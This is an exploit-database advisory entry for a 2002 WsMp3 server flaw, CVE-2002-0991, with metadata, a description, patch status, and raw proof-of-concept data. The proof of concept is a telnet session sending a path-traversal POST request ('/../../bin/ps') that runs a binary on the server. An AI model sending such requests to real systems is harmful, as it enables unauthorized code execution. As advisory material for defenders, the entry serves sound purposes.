header-logo
Suggest Exploit
vendor:
Windows XP
by:
SecurityFocus
8.8
CVSS
HIGH
Insufficient Sanitization of HTTP POST Requests
20
CWE
Product Name: Windows XP
Affected Version From: WsMp3 1.0
Affected Version To: WsMp3 1.0
Patch Exists: YES
Related CWE: CVE-2002-0991
CPE: o:microsoft:windows_xp
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

A vulnerability has been reported in WsMp3

WsMp3 is vulnerable to an attack due to insufficient sanitization of HTTP POST requests. An attacker can exploit this vulnerability by sending a malicious HTTP POST request to the vulnerable server, which can lead to the execution of arbitrary files on the target system.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7645/info

A vulnerability has been reported in WsMp3. The problem occurs due to insufficient sanitization of HTTP POST requests. As a result, an attacker may be capable of executing arbitrary files on a target system. This may lead to the complete compromise of a target system. 

bash$ telnet wsmp3.server.com 8000
Trying 61.37.xxx.xx...
Connected to 61.37.xxx.xx.
Escape character is '^]'.
POST /dir/../../../../../../bin/ps HTTP/1.0

Navigation

Suggest Exploit

Services By CQR